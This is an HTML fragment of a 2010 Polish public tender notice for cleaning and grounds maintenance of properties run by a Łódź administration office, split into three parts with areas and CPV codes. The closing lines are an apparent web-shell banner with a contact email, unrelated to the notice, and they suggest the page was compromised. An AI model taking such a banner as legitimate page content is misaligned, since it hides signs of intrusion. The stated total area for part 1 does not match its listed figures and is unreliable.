<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anwschod.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 w cenie 20,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 10:00, miejsce: Administracja Nieruchomościami Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pokój 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi związane z kompleksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym nieruchomości oraz terenów przynależnych do nieruchomości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem  
    - utrzymaniem w należytym stanie sanitarno-porządkowym powierzchni     
    wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych 
    przynależnych do nieruchomości administrowanych przez Zamawiającego, ujęte 
    w części I (zadaniu nr 1):

część I - zadanie nr 1 (zał. do SIWZ nr 1a)    
                   pow. wew. nieruchomości              -      6.580,00 m2
                   tereny zew. niezabudowane            -    40.238,70 m2  
	       tereny zielone                                  -    17.491,92 m2    
                                                ogółem:              -    63.940,62 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi związane z kompleksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym nieruchomości oraz terenów przynależnych do nieruchomości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem  
    - utrzymaniem w należytym stanie sanitarno-porządkowym powierzchni     
    wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych 
    przynależnych do nieruchomości administrowanych przez Zamawiającego, ujęte 
    w części II (zadaniu Nr 2):

część II - zadanie nr 2  (zał. do SIWZ  nr 1b)  
                   pow. wew. nieruchomości               -    5.867,60 m2
                   tereny zew. niezabudowane             -  25.788,00 m2  
	         tereny zielone                                   -    7.977,00 m2  
                                                 ogółem:              -  39.632,60 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi związane z kompleksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym nieruchomości oraz terenów przynależnych do nieruchomości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem  
    - utrzymaniem w należytym stanie sanitarno-porządkowym powierzchni     
    wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych 
    przynależnych do nieruchomości administrowanych przez Zamawiającego, ujęte 
    w części III (zadaniu Nr 3):

część III - zadanie nr 3 (zał. do SIWZ nr 1c)  
                   pow. wew. nieruchomości                -   33.692,00 m2
                   tereny zew. niezabudowane              -   72.196,40 m2  
	         tereny zielone                                    -   16.900,00 m2   
                                                 ogółem:               - 122.788,40 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com